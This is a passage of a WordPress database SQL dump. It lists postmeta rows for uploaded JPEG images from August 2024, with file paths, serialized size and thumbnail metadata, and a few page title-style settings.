(1896,615,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119959_0.jpg\";s:8:\"filesize\";i:367368;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119959_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12260;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119959_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100150;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119959_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5896;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119959_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61233;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119959_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192889;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119959_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15574;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1897,616,'_wp_attached_file','2024/08/S__62119943_0.jpg'),
(1898,616,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119943_0.jpg\";s:8:\"filesize\";i:402339;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119943_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14854;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119943_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112502;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119943_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7243;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119943_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70067;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119943_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212941;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119943_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18723;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1899,617,'_wp_attached_file','2024/08/S__62119960_0.jpg'),
(1900,617,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119960_0.jpg\";s:8:\"filesize\";i:319785;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119960_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11742;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119960_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86063;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119960_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4794;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119960_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53480;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119960_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164261;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119960_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14499;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1901,618,'_wp_attached_file','2024/08/S__62119962_0.jpg'),
(1902,618,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119962_0.jpg\";s:8:\"filesize\";i:332614;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119962_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12158;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119962_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88193;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119962_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6011;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119962_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54591;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119962_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170544;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119962_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15142;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1903,619,'_wp_attached_file','2024/08/S__62119963_0.jpg'),
(1904,619,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119963_0.jpg\";s:8:\"filesize\";i:451388;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119963_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14930;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119963_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117923;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119963_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6790;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119963_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71825;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119963_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230990;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119963_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18841;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1905,620,'_wp_attached_file','2024/08/S__62119942_0.jpg'),
(1906,620,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119942_0.jpg\";s:8:\"filesize\";i:579564;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119942_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14008;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119942_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143508;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119942_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6419;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119942_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83457;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119942_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:289041;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119942_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18863;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1907,621,'_wp_attached_file','2024/08/S__62119969.jpg'),
(1908,621,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__62119969.jpg\";s:8:\"filesize\";i:479341;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__62119969-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15428;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__62119969-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127725;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119969-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7153;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__62119969-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77730;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__62119969-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247135;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119969-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19646;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1909,622,'_wp_attached_file','2024/08/S__62119948_0-1.jpg'),
(1910,622,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__62119948_0-1.jpg\";s:8:\"filesize\";i:600390;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__62119948_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16347;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__62119948_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155627;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__62119948_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7457;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__62119948_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91713;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__62119948_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:306644;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__62119948_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21219;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1911,623,'_wp_attached_file','2024/08/S__62119968.jpg'),
(1912,623,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__62119968.jpg\";s:8:\"filesize\";i:581434;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__62119968-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18444;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__62119968-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156336;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119968-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8754;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__62119968-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95560;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__62119968-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:299580;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119968-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23695;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1913,624,'_wp_attached_file','2024/08/S__62119970.jpg'),
(1914,624,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/08/S__62119970.jpg\";s:8:\"filesize\";i:739114;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__62119970-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19068;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__62119970-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196678;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119970-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8336;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__62119970-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115060;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__62119970-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:386324;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__62119970-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1915,625,'_wp_attached_file','2024/08/S__62119950_0.jpg'),
(1916,625,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119950_0.jpg\";s:8:\"filesize\";i:706217;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119950_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18454;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119950_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180015;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119950_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8312;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119950_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105491;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119950_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:359264;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119950_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24002;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1917,626,'_wp_attached_file','2024/08/S__62119971_0.jpg'),
(1918,626,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119971_0.jpg\";s:8:\"filesize\";i:372800;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119971_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11004;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119971_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91670;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119971_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5701;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119971_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54685;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119971_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184764;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119971_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1919,627,'_wp_attached_file','2024/08/S__62119973_0.jpg'),
(1920,627,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__62119973_0.jpg\";s:8:\"filesize\";i:421175;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__62119973_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15225;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__62119973_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115667;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119973_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6506;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__62119973_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71432;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__62119973_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:220593;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__62119973_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1921,609,'_edit_last','1'),
(1922,609,'title_style','default'),
(1923,609,'_title_style','field_5d1a0217cf408'),
(1924,628,'title_style','default'),
(1925,628,'_title_style','field_5d1a0217cf408'),
(1927,630,'_wp_attached_file','2024/08/S__62119953_0.jpg'),
